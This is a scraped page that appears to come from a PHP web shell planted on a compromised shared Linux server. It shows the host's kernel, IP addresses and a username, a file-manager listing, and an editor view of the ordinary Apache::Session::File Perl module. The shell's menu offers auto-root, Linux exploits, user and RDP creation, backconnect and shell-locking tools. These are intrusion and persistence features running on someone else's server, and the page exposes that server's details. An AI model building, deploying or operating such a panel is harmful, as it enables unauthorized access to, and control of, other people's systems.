Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Apache /
Session /
[ HOME SHELL ]
Name
Size
Permission
Action
Generate
[ DIR ]
drwxr-xr-x
Lock
[ DIR ]
drwxr-xr-x
MySQL
[ DIR ]
drwxr-xr-x
Serialize
[ DIR ]
drwxr-xr-x
Store
[ DIR ]
drwxr-xr-x
DB_File.pm
1.98
KB
-rw-r--r--
File.pm
2.13
KB
-rw-r--r--
Flex.pm
3.74
KB
-rw-r--r--
Informix.pm
2.73
KB
-rw-r--r--
MySQL.pm
2.24
KB
-rw-r--r--
Oracle.pm
2.71
KB
-rw-r--r--
Postgres.pm
2.59
KB
-rw-r--r--
Sybase.pm
2.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : File.pm
############################################################################# # # Apache::Session::File # Apache persistent user sessions in the filesystem # Copyright(c) 1998, 1999, 2000 Jeffrey William Baker (jwbaker@acm.org) # Distribute under the Perl License # ############################################################################ package Apache::Session::File; use strict; use vars qw(@ISA $VERSION); $VERSION = '1.54'; @ISA = qw(Apache::Session); use Apache::Session; use Apache::Session::Lock::File; use Apache::Session::Store::File; use Apache::Session::Generate::MD5; use Apache::Session::Serialize::Storable; sub populate { my $self = shift; $self->{object_store} = Apache::Session::Store::File->new($self); $self->{lock_manager} = Apache::Session::Lock::File->new($self); $self->{generate} = \&Apache::Session::Generate::MD5::generate; $self->{validate} = \&Apache::Session::Generate::MD5::validate; $self->{serialize} = \&Apache::Session::Serialize::Storable::serialize; $self->{unserialize} = \&Apache::Session::Serialize::Storable::unserialize; return $self; } sub DESTROY { my $self = shift; $self->save; $self->{object_store}->close; $self->release_all_locks; } 1; =pod =head1 NAME Apache::Session::File - An implementation of Apache::Session =head1 SYNOPSIS use Apache::Session::File; tie %hash, 'Apache::Session::File', $id, { Directory => '/tmp/sessions', LockDirectory => '/var/lock/sessions', }; =head1 DESCRIPTION This module is an implementation of Apache::Session. It uses the File backing store and the File locking scheme. You must specify the directory for the object store and the directory for locking in arguments to the constructor. See the example, and the documentation for Apache::Session::Store::File and Apache::Session::Lock::File. =head1 AUTHOR This module was written by Jeffrey William Baker <jwbaker@acm.org>. =head1 SEE ALSO L<Apache::Session::DB_File>, L<Apache::Session::Flex>, L<Apache::Session::MySQL>, L<Apache::Session::Postgres>, L<Apache::Session>
Close